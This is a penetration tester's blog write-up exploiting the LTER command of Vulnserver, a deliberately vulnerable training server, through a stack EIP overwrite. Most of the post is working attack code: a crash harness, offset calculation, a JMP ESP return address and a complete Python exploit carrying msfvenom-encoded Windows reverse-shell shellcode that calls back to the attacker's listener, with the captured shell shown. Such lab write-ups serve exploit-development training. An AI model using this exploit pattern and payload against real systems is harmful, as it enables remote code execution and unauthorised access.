Vulnserver LTER EIP Overwrite – A Little Easier This Time

While a simpler exploit, I wanted to share my LTER EIP overwrite as well.

Vulnserver LTER EIP Overwrite - Introduction

First, if you haven't read my SEH overwrite post, then I recommend you start there. I actually discovered this vulnerability during that process, so I will skip a few of the beginning steps.

Additionally, I won't really cover the character restrictions in this post, so you should read part 2 as well.

Crashing the Service

First, I grabbed my template from the earlier LTER exploit.

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.5.96"
port = 9999

length = 3000

padding = "A" * length

buffer = padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

print s.recv(1024)

print "[+] Sending exploit..."

s.send("LTER /.:/" + buffer)

print s.recv(1024)

s.close()

As you can see, 3000 bytes gives me full control over EIP (as well as EBP).

Vulnserver LTER EIP - EIP Overwrite

Calculating the Offset

With the overwrite verified, it was time to calculate the offset to EIP.

First, I generated a pattern of 3000 bytes.

root@kali:~/vulnserver/lter/eip# msf-pattern_create -l 3000

When I sent this to the server, EIP was overwritten with 0x386f4337.

Vulnserver LTER EIP - EIP Pattern

Putting this into pattern_offset gave me an offset of 2003 bytes.

root@kali:~/vulnserver/lter/eip# msf-pattern_offset -l 3000 -q 386f4337
[*] Exact match at offset 2003

Vulnserver LTER EIP - Verifying Control

Once I calculated my offset, I updated my exploit harness to check the value.

offset = 2003
length = 3000

padding = "A" * offset
overwrite = "BBBB"
extra = "C" * (length - (len(padding) + len(overwrite)))

When I sent this updated payload, EIP was overwritten with my "B"s as expected!

Vulnserver LTER EIP - EIP Control

Additionally, ESP was pointing directly to my extra "C" bytes, indicating that this was a straightforward EIP overwrite to JMP ESP.

Vulnserver LTER EIP - ESP

Vulnserver LTER EIP - JMP ESP

With control of EIP verified, it was time to use mona to find a jump to ESP.

Vulnserver LTER EIP - Mona JMP

When I resent my updated payload, I hit the breakpoint that I set on my selected (ascii) JMP ESP.

Vulnserver LTER EIP - Breakpoint

Shells, Shells, Shells

Since I already knew I had working reverse shell code from my earlier exploit, I just decided to reuse that.

Next, I resent my completed exploit to the listening server.

root@kali:~/vulnserver/lter/eip# python lter_eip_reverse.py
Welcome to Vulnerable Server! Enter HELP for help.

[+] Sending exploit...

On the server-side of things, there was no unhandled exceptions, which was a good sign.

Vulnserver LTER EIP - No Crash

Back on my attacking box, I was able to catch the reverse shell and get my command execution!

root@kali:~/vulnserver/lter/eip# nc -lvvp 4444
listening on [any] 4444 ...
192.168.5.96: inverse host lookup failed: Unknown host
connect to [192.168.5.97] from (UNKNOWN) [192.168.5.96] 49264
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Documents\vulnserver>whoami
whoami
ie8win7\ieuser

Vulnserver LTER EIP - Reverse Shell

The Code

Here is the final exploit that I used for my reverse shell.

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.5.96"
port = 9999

offset = 2003
length = 3000

buffer = "A" * offset
# 0x62501205 = JMP ESP
buffer += "\x05\x12\x50\x62"

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.5.97 LPORT=4444 -f py -e x86/alpha_mixed BufferRegister=ESP
buf =  ""
buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x68\x68\x6c\x42\x43\x30\x37\x70\x57\x70\x61"
buf += "\x70\x6c\x49\x6d\x35\x34\x71\x6f\x30\x42\x44\x4c\x4b"
buf += "\x70\x50\x44\x70\x6c\x4b\x70\x52\x36\x6c\x6c\x4b\x70"
buf += "\x52\x65\x44\x6e\x6b\x43\x42\x77\x58\x36\x6f\x4c\x77"
buf += "\x43\x7a\x65\x76\x74\x71\x59\x6f\x6c\x6c\x75\x6c\x53"
buf += "\x51\x43\x4c\x75\x52\x56\x4c\x35\x70\x4a\x61\x5a\x6f"
buf += "\x64\x4d\x43\x31\x7a\x67\x48\x62\x6c\x32\x62\x72\x62"
buf += "\x77\x4e\x6b\x42\x72\x46\x70\x6e\x6b\x53\x7a\x57\x4c"
buf += "\x6e\x6b\x70\x4c\x44\x51\x43\x48\x48\x63\x57\x38\x53"
buf += "\x31\x48\x51\x53\x61\x4c\x4b\x62\x79\x37\x50\x37\x71"
buf += "\x78\x53\x6e\x6b\x61\x59\x42\x38\x6b\x53\x67\x4a\x42"
buf += "\x69\x4e\x6b\x37\x44\x4c\x4b\x75\x51\x4b\x66\x65\x61"
buf += "\x39\x6f\x6c\x6c\x69\x51\x7a\x6f\x46\x6d\x76\x61\x78"
buf += "\x47\x56\x58\x39\x70\x64\x35\x39\x66\x67\x73\x63\x4d"
buf += "\x68\x78\x45\x6b\x31\x6d\x66\x44\x62\x55\x4b\x54\x62"
buf += "\x78\x6c\x4b\x50\x58\x56\x44\x33\x31\x58\x53\x42\x46"
buf += "\x4c\x4b\x54\x4c\x32\x6b\x4c\x4b\x46\x38\x57\x6c\x56"
buf += "\x61\x6a\x73\x4c\x4b\x64\x44\x4c\x4b\x65\x51\x48\x50"
buf += "\x6d\x59\x31\x54\x64\x64\x76\x44\x71\x4b\x33\x6b\x45"
buf += "\x31\x66\x39\x73\x6a\x73\x61\x6b\x4f\x79\x70\x71\x4f"
buf += "\x43\x6f\x31\x4a\x4c\x4b\x45\x42\x6a\x4b\x4c\x4d\x31"
buf += "\x4d\x73\x58\x67\x43\x76\x52\x47\x70\x55\x50\x73\x58"
buf += "\x53\x47\x43\x43\x65\x62\x73\x6f\x36\x34\x55\x38\x52"
buf += "\x6c\x30\x77\x56\x46\x44\x47\x49\x6f\x6e\x35\x78\x38"
buf += "\x4e\x70\x66\x61\x55\x50\x35\x50\x65\x79\x6f\x34\x66"
buf += "\x34\x46\x30\x55\x38\x34\x69\x6d\x50\x50\x6b\x35\x50"
buf += "\x79\x6f\x4a\x75\x30\x50\x52\x70\x62\x70\x66\x30\x61"
buf += "\x50\x36\x30\x31\x50\x62\x70\x33\x58\x4a\x4a\x46\x6f"
buf += "\x4b\x6f\x79\x70\x69\x6f\x4a\x75\x4a\x37\x32\x4a\x34"
buf += "\x45\x30\x68\x49\x50\x4f\x58\x57\x75\x51\x71\x65\x38"
buf += "\x37\x72\x63\x30\x77\x61\x53\x6c\x4c\x49\x4a\x46\x31"
buf += "\x7a\x44\x50\x53\x66\x36\x37\x50\x68\x6e\x79\x59\x35"
buf += "\x64\x34\x63\x51\x4b\x4f\x4b\x65\x4c\x45\x6f\x30\x50"
buf += "\x74\x76\x6c\x69\x6f\x42\x6e\x66\x68\x63\x45\x38\x6c"
buf += "\x55\x38\x6c\x30\x38\x35\x4d\x72\x30\x56\x69\x6f\x38"
buf += "\x55\x61\x78\x62\x43\x32\x4d\x45\x34\x67\x70\x6b\x39"
buf += "\x6b\x53\x56\x37\x33\x67\x36\x37\x50\x31\x5a\x56\x30"
buf += "\x6a\x64\x52\x61\x49\x73\x66\x5a\x42\x4b\x4d\x55\x36"
buf += "\x58\x47\x37\x34\x77\x54\x45\x6c\x56\x61\x77\x71\x4c"
buf += "\x4d\x61\x54\x31\x34\x32\x30\x6a\x66\x67\x70\x51\x54"
buf += "\x61\x44\x76\x30\x56\x36\x33\x66\x62\x76\x52\x66\x53"
buf += "\x66\x30\x4e\x53\x66\x62\x76\x62\x73\x71\x46\x70\x68"
buf += "\x32\x59\x5a\x6c\x57\x4f\x4c\x46\x4b\x4f\x59\x45\x4d"
buf += "\x59\x39\x70\x42\x6e\x51\x46\x72\x66\x79\x6f\x70\x30"
buf += "\x52\x48\x57\x78\x6e\x67\x45\x4d\x35\x30\x69\x6f\x39"
buf += "\x45\x6f\x4b\x6c\x30\x68\x35\x6d\x72\x76\x36\x71\x78"
buf += "\x4f\x56\x7a\x35\x4f\x4d\x4f\x6d\x79\x6f\x4a\x75\x55"
buf += "\x6c\x66\x66\x31\x6c\x45\x5a\x6b\x30\x6b\x4b\x79\x70"
buf += "\x73\x45\x33\x35\x6f\x4b\x32\x67\x75\x43\x34\x32\x30"
buf += "\x6f\x50\x6a\x65\x50\x71\x43\x39\x6f\x6e\x35\x41\x41"

buffer += buf

buffer += "B" * (length - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

print s.recv(1024)

print "[+] Sending exploit..."

s.send("LTER /.:/" + buffer)

print s.recv(1024)

s.close()

Vulnserver LTER EIP Overwrite - Conclusion

This was definitely easier to my earlier LTER exploit, but I wanted to finish it up for completeness' sake. Again, you can find the SEH exploit write-ups below.

I may only continue with one exploit per command, unless there is something particularly interesting about it.

If you have any suggestions for a command or exploit hat I should work on next, then definitely let me know!

Finally, you can find the exploit in my GitHub repository, but let me know if you think there is anything that I should add.

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Principal Penetration Testing Consultant for Secureworks. His previous position was a Senior Penetration Tester for a major financial institution.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.